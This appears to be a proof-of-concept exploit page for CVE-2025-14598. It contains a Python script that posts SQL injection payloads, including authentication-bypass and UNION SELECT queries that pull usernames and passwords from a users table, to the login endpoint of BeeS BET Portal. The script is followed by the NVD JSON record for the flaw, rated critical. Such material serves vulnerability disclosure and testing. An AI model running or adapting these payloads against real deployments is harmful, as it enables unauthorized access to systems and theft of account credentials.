CVE-2025-14598

import requests import sys # CVE-2025-14598 PoC - BeeS BET Portal SQL Injection # Target: /login or /authentication endpoint def exploit_sql_injection(target_url): """ SQL Injection PoC for CVE-2025-14598 Attempts to extract admin password hash via UNION-based injection """ # Login endpoint login_url = f"{target_url}/login" # SQL Injection payloads payloads = [ "admin' OR '1'='1", "admin' UNION SELECT 1,2,3,4,5-- -", "admin' UNION SELECT username,password,email,role,1 FROM users WHERE '1'='1", "' OR 1=1 --", "admin' OR '1'='1' --" ] headers = { 'Content-Type': 'application/x-www-form-urlencoded', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)' } print(f"[*] Target: {target_url}") print(f"[*] CVE-2025-14598 SQL Injection PoC") print("=" * 50) for payload in payloads: data = { 'username': payload, 'password': 'any' } try: response = requests.post(login_url, data=data, headers=headers, timeout=10, verify=False) if 'dashboard' in response.text.lower() or 'admin' in response.text.lower(): print(f"[!] Potential successful injection with payload: {payload}") print(f"[+] Response status: {response.status_code}") return True else: print(f"[*] Tested payload: {payload}") except requests.RequestException as e: print(f"[!] Request failed: {e}") print("[*] Manual verification may be required") return False if __name__ == "__main__": if len(sys.argv) > 1: target = sys.argv[1] else: target = "http://target-server.com/bet-portal" exploit_sql_injection(target)

{"cve": {"id": "CVE-2025-14598", "sourceIdentifier": "[email protected]", "published": "2026-01-09T13:15:54.990", "lastModified": "2026-02-10T20:29:35.070", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "BeeS Software Solutions BET Portal contains an SQL injection vulnerability in the login functionality of affected sites. The vulnerability enables arbitrary SQL commands to be executed on the backend database."}, {"lang": "es", "value": "BeeS Software Solutions BET Portal contiene una vulnerabilidad de inyección SQL en la funcionalidad de inicio de sesión de los sitios afectados. La vulnerabilidad permite la ejecución de comandos SQL arbitrarios en la base de datos de backend."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:cloudilyaerp:bet_e-portal:-:*:*:*:*:*:*:*", "matchCriteriaId": "41BBFEF4-9BC1-4E71-8E91-BF57CCE249D2"}]}]}], "references": [{"url": "https://afnaan.me/cve/cve-2025-14598", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://cloudilyaerp.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/Afnaan-Ahmed/CVE-2025-14598", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.kb.cert.org/vuls/id/361400", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Third Party Advisory"]}]}}